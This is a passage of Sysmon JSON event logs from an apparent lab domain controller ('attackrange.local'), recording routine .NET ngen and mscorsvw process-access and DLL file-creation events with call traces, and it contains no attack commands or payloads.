C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.169","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-001065800C00}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7789,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:12.372\r\nProcessGuid: {E2A3D6B1-1338-5F25-0000-001065800C00}\r\nProcessId: 1164\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\48c-0\\Microsoft.Transactions.Bridge.Dtc.dll\r\nCreationUtcTime: 2020-08-01 07:01:12.372","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:12.372","ProcessGuid":"{E2A3D6B1-1338-5F25-0000-001065800C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\48c-0\\Microsoft.Transactions.Bridge.Dtc.dll","CreationUtcTime":"2020-08-01 07:01:12.372","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7790,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.419\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-0010B8860C00}\r\nTargetProcessId: 4784\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.419","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-0010B8860C00}","TargetProcessId":"4784","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7791,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.419\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-0010B8860C00}\r\nTargetProcessId: 4784\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.419","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-0010B8860C00}","TargetProcessId":"4784","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7792,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.419\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-0010B8860C00}\r\nTargetProcessId: 4784\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.419","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-0010B8860C00}","TargetProcessId":"4784","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7793,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.481\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-0010FE8A0C00}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.481","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-0010FE8A0C00}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7794,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.481\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-0010FE8A0C00}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.481","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-0010FE8A0C00}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7795,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.481\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-0010FE8A0C00}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.481","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-0010FE8A0C00}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7796,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.622\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-0010908E0C00}\r\nTargetProcessId: 4756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 